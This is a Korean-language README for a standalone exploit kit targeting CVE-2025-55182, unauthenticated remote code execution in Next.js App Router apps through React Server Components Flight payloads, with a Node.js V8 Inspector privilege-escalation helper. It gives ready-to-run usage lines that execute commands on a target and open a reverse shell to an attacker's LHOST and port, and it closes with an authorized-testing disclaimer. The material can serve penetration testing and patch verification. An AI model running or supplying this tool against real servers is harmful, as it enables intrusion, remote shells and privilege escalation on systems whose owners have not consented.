
CVE-2025-55182용 독립 실행형 익스플로잇으로, React Server Components Flight 역직렬화를 통해 Next.js App Router에서 인증 없이 RCE를 달성하며, 리버스 셸 및 Node.js V8 Inspector 권한 상승 헬퍼를 포함합니다.
Next.js App Router 앱에서 React Server Components를 활성화한 경우의 CVE-2025-55182를 위한 독립 실행형 익스플로잇입니다. 서버 액션 엔드포인트로 제작된 RSC Flight 페이로드를 전송하여 인증 없이 원격 코드 실행을 달성합니다. process.mainModule.require 샌드박스 우회를 통해 권한 있는 프로세스에서 코드를 실행하는 Node.js V8 Inspector(디버그 포트) 로컬 권한 상승 헬퍼가 포함되어 있습니다.
CVE: CVE-2025-55182
python3 -m pip install requests # Python PoC용
cdp_privesc.pypython3 cdp_privesc.py <target>
react2shell-poc.pypython3 react2shell-poc.py -t http://TARGET:3000 -c "id" # 오류 기반 명령 탈취
python3 react2shell-poc.py -t http://TARGET:3000 --revshell --lhost LHOST --lport 4444
react2shell-poc.py는 p3ta00의 공개 CVE-2025-55182 PoC로, 자체 포함 체인을 위해
https://github.com/p3ta00/react2shell-poc에서 변경 없이 벤더 제공되었습니다.
cdp_privesc.py(Node.js V8 Inspector 로컬 권한 상승)는 원본 코드입니다.
승인된 보안 테스트 및 교육 목적으로만 사용하십시오. 소유한 시스템 또는 테스트에 대한 명시적 서면 허가를 받은 시스템에서만 실행하십시오.
작성자: r3vpwnx